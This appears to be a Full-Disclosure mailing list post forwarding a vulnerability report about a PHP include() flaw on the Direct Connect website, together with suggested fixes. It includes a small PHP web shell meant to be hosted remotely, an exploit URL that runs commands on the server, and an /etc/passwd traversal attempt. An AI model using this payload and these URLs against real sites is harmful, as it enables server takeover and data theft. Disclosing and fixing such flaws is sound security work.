> neo-modus.com is the home of the quite popular file sharing utility > 'direct > connect', unfortunately their website is vulnerable to a common php > include() > vulnerability. Message below was send 2 weeks ago to the 'bugs' email > address listed on their website. I didn't get any response. > > --- Forwarded Message --- > > Dear Reader, > > > > I recently stumbled across your website www.neo-modus.com, I fiddled > > around > > a bit with the .php scripts, and found that they are vulnerable to a > very > > common php error. > > > > The index.php script takes a parameter 'page', so it knows what page to > > show. It then passes the value of this parameter DIRECTLY into a > include() > > statement. This is very, very bad. Let's say I go to the url: > > http://www.neo-modus.com/?page=/etc/passwd - this tries to open > > /etc/passwd.html - so i can break > > out of the document root and view every file with an .html (or .php?) > > extension. This seems not too bad, but there's more. PHP has a feature > > called > > "furl_open", which allows include() to take an URL as a parameter to > > include it in > > it's page. So we create a text file on a different webserver (which > doesnt > > parse .txt files) called test.txt, which contains: > > > > <?php > > printf("<div align=\"left\"><pre>"); > > printf("%s", nl2br(system($HTTP_GET_VARS['cmd']))); > > printf("</pre></div>"); > > ?> > > > > we then go to the url > > http://www.neo-modus.com/?page=http://my.webpage.com/test.txt&cmd=ls -al > > > > and we get a nice "ls -al" output runned on YOUR webserver. We can run > all > > commands with privileges of the webserver. I think you can understand > how > > bad > > this is. > > > > To fix these issues, I suggest you disable furl_open in the php > > configuration file, and filter the "page" parameter passed to index.php > so > > that it strips > > slashes, backslashes, dots and limits it to a specific directory only. > > > > Another thing: don't place files which contain password information in > the > > document root. ConnectToDatabase.php contains sensitive information. > > Change > > your mysql passwords, and limit access to the mysql server from YOUR > > website > > host only. I could connect without problems - this should not be the > case. > >
-- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ NEU: Mit GMX ins Internet. G�nstige DSL- & Modem/ISDN-Tarife! _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
